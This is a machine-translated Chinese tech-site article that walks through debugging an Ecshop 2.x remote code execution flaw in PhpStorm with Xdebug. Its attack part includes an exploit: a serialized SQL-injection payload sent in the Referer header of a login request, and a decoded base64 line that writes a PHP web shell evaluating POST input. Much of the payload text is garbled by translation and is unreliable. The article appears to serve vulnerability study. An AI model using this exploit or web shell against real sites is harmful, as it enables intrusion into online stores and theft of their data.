In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-04-02 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)05/31 Report--
How to carry out Ecshop2.x code execution vulnerability dynamic debugging analysis, many novices are not very clear about this, in order to help you solve this problem, the following editor will explain for you in detail, people with this need can come to learn, I hope you can gain something.
First, background introduction
Known as the largest open source online store system in China, it can be written directly to webshell remotely.
This article will analyze every detail of the vulnerability through dynamic analysis. You can see the principle of the vulnerability, which is very detailed. This article focuses on the skills of dynamic analysis and audit and how to debug the vulnerability. The vulnerability itself is also a loophole worth learning. To construct this attack chain requires a deep understanding of every detail.
Second, the construction of dynamic debugging environment
Download and install phpstudy and phpstorm by yourself
First determine the php version
Then modify the configuration file
Modify the php.ini as follows
[XDebug]
Xdebug.profiler_append = 0xdebug.profiler_enable = 1xdebug.profiler_enable_trigger = 0xdebug.profiler_output_dir = "C:\ phpStudy\ tmp\ xdebug" xdebug.trace_output_dir = "C:\ phpStudy\ tmp\ xdebug" xdebug.profiler_output_name = "cache.out.%t-%s" xdebug.remote_enable = 1xdebug.remote_handler = "dbgp" xdebug.remote_host = "127.0.0.1" zend_extension= "C:\ phpStudy\ php53\ ext\ xdebug.dll" xdebug.remote_port=9000xdebug.idekey= PHPSTROM
Set the php version, be sure to match it.
The following picture is not moved by default.
The following modifications to the key and port are as follows
Configure the root debugging environment here
Just leave a Chrome browser here
Chrome browser to install plug-ins JetBrains IDE Support download and install no need to modify the configuration, so it is basically OK.
Third, dynamic debugging and analysis of vulnerabilities
The following dynamic analysis, the advantage of dynamic analysis is that the vulnerability analysis is clearer.
Breakpoint here we have broken the starting point of the vulnerability to facilitate the analysis of every detail, and then click debug
Then the browser will open
Then click to log in, which will trigger the breakpoint and you can see that it has stopped at the breakpoint.
Here are some keyboard shortcuts to use:
F7 will follow the function.
F8 step out is a line of walking, do not enter the function, some loops or do not want to see the function directly f8
After entering the function, if you want to jump out, use shift+f8.
Ctrl+art plus click on the function you want to see will enter
Alt + f7 will search for who called this function or variable
These are the things I often use. After mastering these skills, I can debug them.
Here HTTP_REFFER can be controlled to assign to $back_act
Let's use burp to grab the package and test the vulnerability, and analyze payload first.
| 554fcae493e564ee0dc75bdf2ebf94caads | 554fcae493e564ee0dc75bdf2ebf94caads 2: {Slav 3: "num"; slug 280: "* / union select 1Magic 0x272f2aPower3x272f2aPower3x7b24617364275d3b617373657274286262636345f6465636f646275a6d6c735a56397764585266592397564475634768774a7a45634768774a79776e50443977614841675a585a686243676b583145532624d544d7da4e3130704f79412f6970293293b2f2f77877710e -" sVER2: "id" / *};
The string of 554fcae493e564ee0dc75bdf2ebf94caads can be divided into two parts, one is 554fcae493e564ee0dc75bdf2ebf94ca, the other is that ads,ads controls the flow of functions into insert_ads functions, and the one in front of 554fcae493e564ee0dc75bdf2ebf94ca is a hash, which will be judged and removed after judgment. Without it, it cannot enter the attack chain, and the dynamic analysis process will be introduced later.
The rest of the code is unraveled like this.
{$asd']; assert (base64_decode ('file_put_contents (' 1.php'); / /} xxx
Send a package
GET / upload/user.php?act=login HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Cookie: ECS_ID=3e839434a217e8c1f2a931f70086935a43141a6d; ECS [times _ times] = 1Referer: 554fcae493e564ee0dc75bdf2ebf94caads | aV2: {Sv3: "num" SVERUR 280: "* / union select 1Power0x272f2aRecrow3Reporter 4Revery5275d3b61737364275d3b61737372742862636536345f6465636f646528275a6d6c735a563977645659239756447567564484a7a4575634768774a79776e5044776e446148475a585a686243676b585553152624d544d7a4e3130704f794f79704f797027293b2f2f7d788710e -"; closeUpgrade-Insecure-Requests: "id"; s2f7f7d78810x "; Connection: 1
You can see the success of writing to webshell
Then we continue to debug, we first walk all the way f8 to here, and then f7 enter to have a look.
The key point here is insert_mod, which is called dynamically, because we cannot grab the package and send payload test, so we need to modify the parameters to make the process execute according to the payload attack chain, and the insert_ads needs to be executed in the attack chain. Here is a hash judgment
As you can see below, there is this hash, so there is no control here, and then continue the process.
The hash will be removed in the following picture and the rest of the 1Magne3, 5, and 7 in $k setvalue can be controlled, so here we change its value to our payload in 1, right-click on setvalue
Re-copy the payload, right-click setValue, here direct copy will report an error, or a little bit to modify it, and then double quotation marks to escape
Ads | ads 2: {Slav 3:\ "num\"; slav 280:\ "* / union select 1Magic 0x272f2aMagic 3, 4, 5, 5, 6, 6, 7, 7, 8, 8, 0, b24617364275d3b61737362742862636345f6465636f6465285a6d6c735a5639776458526659239756447567564484d6f4a77575634768774a79776e5044776148416755a585686243676b583142503152624d544da4130704f4130704f4f79412506370293b2f2f77877888810 -";\ sRent2 ";
Continue f7 into insert_mod, and then find that the insert_ads function has been controlled, but when payload is deserialized, $para is false, indicating that there is something wrong with our payload. Click debug to start over.
Change the position and modify it before the deserialization function. In the following picture, you can see that $para has a value. It is our payload.
Go on to insert_ads, all the way to f8, and let our payload insert the variable num.
And ended up stitching it like this.
Keep going down, all the way to here on f8
Then f7 enters and takes a look, substituting payload into the _ eval code execution function, where payload will also be processed by fetch_str, and f7 will enter and have a look.
F8 came here, before the source has not changed, after the preg_replace will deal with {
Payload becomes $asd';] assertxxx is substituted into select
This select function can't follow in, so we can only analyze it statically. We can find ctrl+shift+f like this.
Enter get_val,substr in select and remove $
Payload becomes: asd';] assertXXX
Entered the make_var.
Finally got the splicing.
Eventually payload becomes
$this- > _ var ['asd']; assert (base64_decode (' ZmlsZV9wdXRfY29udGVudHMoJzEucGhwJywnPD9waHAgZXZhbCgkX1BPU1RbMTMzN10pOyA/Picp')); / /']
And finally came to eval.
One more walk here and the shell will be written in.
Is it helpful for you to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.